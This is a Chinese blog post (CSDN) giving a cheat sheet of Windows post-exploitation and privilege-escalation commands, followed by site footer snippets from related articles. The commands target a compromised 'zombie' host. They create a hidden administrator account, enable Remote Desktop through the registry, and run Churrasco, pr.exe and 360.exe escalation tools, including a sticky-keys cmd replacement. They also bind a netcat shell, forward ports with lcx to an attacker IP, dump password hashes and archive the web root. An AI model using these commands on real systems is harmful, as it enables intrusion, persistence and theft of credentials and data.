关于cmdshell提权的一些命令

最新推荐文章于 2024-06-04 17:59:49 发布
最新推荐文章于 2024-06-04 17:59:49 发布
阅读量2.7k 收藏 5
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tsvico/article/details/70162622
版权
CMD部分提权常用命令


ipconfig         显示本地IP地址


net start telnet           开telnet服务


net use z:127.0.0.1c$     映射对方的C盘 


net user            查看所有用户列表


net user xiaoma xiaoma /add           添加用户xiaoma密码为xiaoma


net localgroup administrators xiaoma /add   将帐号xiaoma升级为管理员 


attrib    隐藏文件


开3389


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f




查终端端口


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp 
 
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■


巴西烤肉   Churrasco.exe "命令"


使用方法:


C:\RECYCLER\Churrasco.exe "net user xiaoma xiaoma /add && net localgroup administrators xiaoma /add"


C:\RECYCLER\Churrasco.exe "net user admin$ /del"  删除帐号


query user  查看会话


logoff ID号  踢掉


C:\RECYCLER\Churrasco.exe "logoff 1"  


■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■


NC反弹


路径\nc.exe -l -p 端口 -t -e 路径\cmd.exe


c:\RECYCLER\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe


NC上传


DOS界面下运行:


NC -vv www.baidu.com 80<1.txt


-vv: 回显


80: www端口


1.txt: 就是你要发送的数据包


■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■


LCX端口转发


先本地监听51端口 lcx.exe -listen 51 3389


c:\recycler\lcx.exe -slave 自己的ip 51 肉鸡IP 3389    LCX转发


c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389


■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■


360提权


1.开启终端服务,端口为3389;用法:360.exe “port”
2.替换5下shift为cmd;用法:360.exe “sethc”




====================================================================


gethash使用




C:\RECYCLER\gethash.exe $local


=========================================================================


pr提权




c:\recycler\cmd.exe
c:\recycler\pr.exe


pr.exe "net user xiaoma xiaoma /add & net localgroup administrators xiaoma /add"


================================================================================
rar.exe打包命令


cmd.exe /c "\Program Files\winrar\rar.exe" a -r d:\wwwroot\1.rar d:\wwwroot




tsvico
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。 2、 必须可以以某种方式执行sql语句,...
cmd反弹shell提权
10-24
### cmd反弹shell提权知识点详解 #### 一、概述 在网络安全领域,特别是渗透测试过程中,“cmd反弹shell提权”是一种常见的技术手段。通过这种方式,攻击者能够在远程目标机器上获得更高权限的访问控制,从而进一步...
sql xp_cmdshell 命令
翱翔的天空
02-16 1504
xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。由于xp_cmdshell 可以执行任何操作系统命令,所以一旦SQL Server管理员帐号(如sa)被攻破,那么攻击者就可以利用xp_cmdshell 在SQL Server中执行操作系统命令,如:创建系统管理员,也就意味着系统的最高权限已在别人的掌控之中。由于存在安全隐患,所以在S
CMD】带参数请求提权方法
NXY666
02-21 2068
通过调用VBS启动带有管理员权限的CMD,并传入自身包含的参数。
SQL Server数据库xp_cmdshell提权笔记
最新发布
千寻的博客
06-04 949
SQL Server数据库xp_cmdshell提权
学习日志10:提权方法总结
m0_37622973的博客
09-10 596
一、windows提权 user->administrator->system 1.at命令,定时以system权限执行命令(例如打开cmd) win7以前的版本 admin->system 2.利用服务(服务都是system用户启动的),设置一个cmd服务,再手动启动此服务 win7,8 admin->system 3.利用Sysinternal Suite组件中的pse...
关于win10用户提权和使用管理员模式cmd命令提示符和在内部切入
qq_59526467的博客
05-17 1294
输入以下指令 runas /users:id cmd。2、或者同理在搜索框直接搜索命令提示符。1、直接在如图打开,以管理员模式运行,密码是用户密码不是pin。
Windows本地提权 · 上篇
qq_61553520的博客
05-31 1676
Windows本地提权,这种提权适用于有一本地个用户的基础上,有一定的权限,无法从webshell上进行提权
没有Wscript.shell组件提权.txt
07-18
### 没有Wscript.shell组件的提权技术解析 #### 标题解析 标题“没有Wscript.shell组件提权.txt”明确指出了一种在不依赖`Wscript.shell`组件的情况下进行权限提升的方法。通常情况下,`Wscript.shell`是Windows...
SQL 提权 常用命令
12-15
database=数据库名 2、添加新用户 declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net user 新用户 密码 /add’ 3...
cmd和ii6系统提权工具(密码996).zip
09-07
cmd和ii6系统提权工具,密码是:996 cmd.exe文件:把这个文件传到服务器中,可以获得更高权限的命令cmd需要用到外部接口wscript.shell:也就是iis6.exe 上传iis6.exe后可使用iis6.exe "whoami"等命令
cmd提权
Goldstine的博客
03-18 4058
cmd提权: 打开服务:net start 创建一个用户:net user goldstine 888888 /add 提升权限:net localgroup administrators gloldstine /add 激活:net user goldstine /active:yes 切换用户,登录 打开: runas /noprofile /user:goldstine c...
cmd提权的一些常用命令
dichunting8344的博客
06-21 1235
0x00 小菜今天学习了一些windows下的提权,分享一下,以后也方便查看,也请大牛指教 0x01 cmd基本命令(这乃安全工程师必备,如果你不知道,百度google你值得拥有)net start telnet 开telnet服务(开启服务 service start XX)net user            查看所有用户列表net user hac...
Linux安全之提权命令
mengmeng_921的博客
09-29 2550
是 linux 系统管理指令,是允许系统管理员让普通用户执行一些或者全部的 root 命令的一个工具,如 halt,reboot,su 等等。这样不仅减少了 root 用户的登录 和管理时间,同样也提高了安全性。sudo 不是对 shell 的一个代替,它是面向每个命令的。Linux安全之提权命令
xp_cmdshell简单介绍
nekopoch的博客
01-17 2514
简介 xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。 用于运行命令行(cmd)。 这对于使用T-SQL在操作系统中运行诸如复制文件,创建文件夹,共享文件夹等任务非常有用。 (45条消息) 如何使用xp_cmdshell扩展过程_culuo4781的博客-CSDN博客 相关命令 命令命令基本上都可用 以下只列出来部分 dir 查看文件目录 相当于linux的ls type 显示文本内容 type [drive:] [pa
linux 提权总结
weixin_51681694的博客
06-13 7135
会继续补充.....
window2003 中cmd提权到system
xiaolan458的专栏
04-09 281
window提权 system
linux提权
mlws1900的博客
07-08 2476
-rw表示文件所有者权限为可读可写不可执行对应第一个root表示文件所有者为root-r--表示只读对应第二个root表示文件所属的组r--代表着other,其他用户(除了该文件所有者和该文件所属组)的权限为只读更改文件权限以上第一张图片的权限用数字(权限码)表示为644(可读可写为4+2,只读为4) 原理:部分命令 特定的权限 验证当前用户密码即可执行root权限 查看哪些命令可以以root执行 查看passwd文件第一列,用户 利用以上命令提权至rootGTFOBins其他利用方
Windows提权 cmd 开启 3389
代码审计
04-18 8899
1.操作系统的名称和版本信号 Systeminfo | findstr /B /C:”OS Name” /C:”OS Version” Systeminfo | findstr /B /C:”OS 名称” /C:”OS 版本” 修补程序 补丁 主机名称:hostname 命令 环境变量:set 命令 whoami 查看所有用户 查看所有用户:”net user” 或者” net1 user”命令 查看管理员用户组:”net localgroup administrators”或者 “net1 l
cmdshell命令
09-19
以下是一些常用的cmdshell命令: 1. dir:显示当前目录中的文件和子目录列表。 2. cd:更改当前目录。 3. mkdir:创建一个新目录。 4. del:删除文件。 5. copy:复制文件。 6. ping:测试网络连接。 7. tasklist:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值